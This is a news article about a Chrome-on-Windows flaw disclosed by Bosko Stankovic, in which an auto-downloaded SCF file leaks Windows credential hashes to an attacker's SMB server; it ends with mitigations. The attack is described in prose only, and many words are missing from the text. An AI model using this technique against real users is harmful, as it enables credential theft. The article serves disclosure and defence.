A Google Chrome vulnerability, which was uncovered by DefenceCode security engineer Bosko Stankovic, is said to allow hackers to malware onto a victim’s PC in order to steal people’s Windows credentials and launch SMB (Server Message Block) relay attacks, according to security experts.
Stankovic said in a blog that he found the flaw in a default configuration of the latest version of Google’s Chrome running on any version of Microsoft’s Windows operating system, including Windows 10. The flaw shouldn’t just have IT s worried, as it also poses a “significant threat” to large companies and even regular s. He also claimed that just by visiting a website containing a malicious SCF (Shell Command File) file, could allow victims to unknowingly share their computer’s credentials with hackers via Chrome and the SMB protocol.
The attack technique that can allow credential theft is not new, but a combination of two different techniques, one of which taken from the Stuxnet operation (Stuxnet — a powerful malware that specially designed to destroy Iran’s nuclear program) and the other from a technique demonstrated at a Black Hat security conference by two security researchers.
Stealing Windows Credentials Centered Around SCF files:
According to Stankovic, the attack is pretty straightforward which involves victims being tricked into clicking on a malicious link, which triggers an automatic of Windows Explorer SCF file.
“SCF (Shell Command File) is a file format that s a very limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin. Just like LNK files (shortcuts), SCF files, when stored on disk, will retrieve an icon file when the loads the file in a Windows Explorer window.”
Stankovic explains that it’s very easy to get an SCF file on s’ computers. This is because, in its default configuration, Chrome will automatically files that it deems safe without prompting the for a location. Google deems SCF files as safe, having no reason to prompt the for action.
The SCF file lies dormant until the victim opens the directory folder, after which it attempts to exfiltrate data linked with a Windows icon located on the hacker’s server. This, in turn, provides the attacker with the victim’s name and hashed .
“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” Stankovic wrote in a blog post, describing the flaw.
Defeating Windows Credential Theft:
The security researcher advises the s to disable the automatic s in Google Chrome. To do so, one needs to open ‘Show Advanced Settings’ in Settings. There, check the ‘Ask where to save each file before ing.’ This change will force Google to ask for your permission before ing a file, which would significantly decrease the risk of credential theft attacks using SCF files.
More advanced protection measures include blocking outbound SMB requests from the local network to the WAN via firewalls, so local computers can’t query remote SMB servers.
